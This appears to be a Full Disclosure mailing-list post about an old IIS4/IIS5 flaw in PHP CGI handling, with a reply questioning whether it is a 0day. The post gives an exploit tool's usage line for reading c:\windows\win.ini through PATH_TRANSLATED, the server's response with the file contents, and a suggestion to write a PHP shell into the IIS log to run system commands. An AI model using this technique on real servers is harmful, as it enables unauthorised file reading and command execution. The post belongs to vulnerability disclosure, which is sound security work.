Discovered in 2000 for IIS4\IIS5 0day. .php -> php.exe the exploit file ver 4.1.1 .
http://seclists.org/fulldisclosure/2012/Apr/13 usage: iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini yuan can get the file c:\windows\win.ini HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 10 Apr 2014 02:11:37 GMT Connection: close X-Powered-By: PHP/4.0.0 Content-type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] asf=MPEGVideo asx=MPEGVideo ivf=MPEGVideo m3u=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpv2=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wvx=MPEGVideo [SciCalc] layout=0 You can use the IIS log file write phpshell, execute the PHP call system cmd. > Date: Wed, 9 Apr 2014 23:11:28 +0300 > From: kirils.solovj...@kirils.com > To: yuange1...@hotmail.com > Subject: Re: [FD] iis cgi 0day > > Sorry, I don't read Chinese. > How is this a 0day? > > -- > Kirils Solovjovs _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
